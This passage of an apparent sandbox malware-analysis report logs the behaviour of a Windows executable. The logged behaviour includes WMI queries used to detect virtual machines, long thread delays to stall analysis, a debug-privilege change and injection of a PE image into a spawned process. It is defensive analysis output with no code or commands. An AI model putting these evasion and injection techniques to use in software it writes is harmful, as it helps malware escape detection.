Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 31B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 33E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 53E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 95B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: A5B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: A7C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: B7C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 13E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 2F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Window / User API: threadDelayed 7733			Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Window / User API: threadDelayed 1854			Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7920	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7804	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe TID: 7772	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: 9dOKGgFNL2.exe, 00000002.00000002.1858196730.0000000001193000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Memory written: C:\Users\user\Desktop\9dOKGgFNL2.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Process created: C:\Users\user\Desktop\9dOKGgFNL2.exe "C:\Users\user\Desktop\9dOKGgFNL2.exe"

Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Users\user\Desktop\9dOKGgFNL2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
